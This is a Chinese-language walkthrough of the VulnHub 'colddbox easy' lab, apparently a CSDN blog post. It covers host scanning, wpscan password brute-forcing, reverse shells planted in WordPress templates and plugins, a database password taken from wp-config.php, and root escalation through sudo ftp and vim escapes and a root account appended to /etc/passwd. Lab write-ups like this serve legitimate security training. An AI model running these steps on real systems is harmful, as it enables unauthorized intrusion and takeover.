VulnHub:colddbox easy

靶机下载地址

信息收集

主机发现

攻击机网段192.168.31.0/24,扫描同网段存活主机。

nmap 192.168.31.0/24 -Pn -T4

发现靶机,IP为192.168.31.176。

端口扫描

扫描靶机开放端口。

nmap 192.168.31.176 -A -p- -T4

开放了80,4512端口,注意ssh服务端口改到了4512端口上(后续如果要使用ssh登录需要加上-p 4512)。

web信息收集

访问80端口,首页如图:

根据首页信息,该网站由WordPress搭建。直接使用wpscan枚举用户名和密码,枚举出三个用户:philip,c0ldd,hugo,分别枚举密码。

wpscan --url http://192.168.31.176 -e u,p,t
# 得到c0ldd,hugo,philip三个用户名,分别枚举密码
wpscan --url http://192.168.31.176 --passwords /usr/share/wordlists/nmap.lst --usernames c0ldd --max-threads 100

只有c0ldd用户枚举出密码:9876543210

拿到用户名和密码,尝试登录wordpress后台。访问/wp-login.php输入用户名密码,发现成功登录管理员后台。

getshell

WordPress getshell常用方法通过msf获取目标靶机shell在该靶机中无法成功,只能通过其他方式getshell,WordPress getshell的方法有:

  1. 将反弹shell写入网站模板中

  2. 将反弹shell压缩成zip,伪装成插件进行安装

  3. 将反弹shell添加到WordPress后台已安装的插件代码中

  4. 安装有漏洞的插件

下面演示两种常用的getshell方法。

方法1:网站模板

既然登录了管理员账户,就可以修改模板,在模板中写入反弹shell,访问即可。

例如,修改404.php模板的内容。

反弹shell脚本(php-reverse-shell)_php-reverse-shell.-CSDN博客

写入反弹shell脚本后,点击Update File上传成功才能利用。

# 攻击机 端口号与反弹shell脚本内一致
nc -lvp port
# 访问http://192.168.31.176/wp-content/themes/twentyfifteen/404.php

成功getshell。获取一个交互式shell执行:python3 -c 'import pty;pty.spawn("/bin/bash")'

方法2:添加反弹shell到插件代码

在插件选项中看到已经安装了两个插件,随便启用一个(记得一定要启用),这里启用的是Hello Dolly插件。

点击Edit编辑插件代码,在代码中添加反弹shell脚本,点击Update File更新。

攻击机开启nc监听5555端口。成功getshell。

getshell后进行信息收集,在/var/www/html下找到一个hidden文件夹。

访问后得到的信息是:需要c0ldd用户修改hugo用户的密码,以便hugo登录并上传文章。

试过修改密码然后就不知道有啥用了。

同样在/var/www/html路径下cat wp-config.php找到一个数据库账号和密码。

账号:c0ldd

密码:cybersecurity

/home/c0ldd目录下发现user.txt,但是没有权限,c0ldd才有读权限。

既然只有c0ldd用户有读权限,就尝试切换到c0ldd用户,拿上面的密码登录c0ldd用户。

得到flag1,是一串base64加密字符。解密后是西班牙语:

Felicidades, primer nivel conseguido!

提权

sudo -l

vim,ftp,chmod这三个都可以用。

# ftp
sudo ftp
!/bin/bash
​
#vim
sudo vim -c ':!/bin/sh'
​
# chmod
sudo chmod 777 /etc/passwd
openssl passwd -salt '12' 123456   //生成加密密码
12tir.zIbWQ3c  //上一步生成的加密密码
echo "akk:12tir.zIbWQ3c:0:0:ROOT:/root:/bin/bash" >> /etc/passwd //向/etc/passwd中写入一个root权限的用户akk

1、ftp提权演示如图:

2、vim提权演示如图:

3、chmod提权演示如图:

相关推荐
F-2H3 分钟前
C语言:指针4(常量指针和指针常量及动态内存分配)
java·linux·c语言·开发语言·前端·c++
aherhuo6 分钟前
基于openEuler22.09部署OpenStack Yoga云平台(一)
linux·运维·服务器·openstack
檀越剑指大厂32 分钟前
【Linux系列】Shell 脚本中的条件判断:`[ ]`与`[[ ]]`的比较
linux·运维·服务器
车载诊断技术2 小时前
电子电气架构 --- 什么是EPS?
网络·人工智能·安全·架构·汽车·需求分析
2301_819287123 小时前
ce第六次作业
linux·运维·服务器·网络
武汉联从信息3 小时前
如何使用linux日志管理工具来管理oracle osb服务器日志文件?
linux·运维·服务器
安全方案3 小时前
如何识别钓鱼邮件和诈骗网站?(附网络安全意识培训PPT资料)
网络安全·安全培训
Aileen_0v03 小时前
【AI驱动的数据结构:包装类的艺术与科学】
linux·数据结构·人工智能·笔记·网络协议·tcp/ip·whisper
州周4 小时前
Ftp目录整个下载
linux·服务器·数据库
Jackey_Song_Odd4 小时前
Ubuntu 24.04.1 解决部分中文字符(门、径)显示错误的问题
linux·ubuntu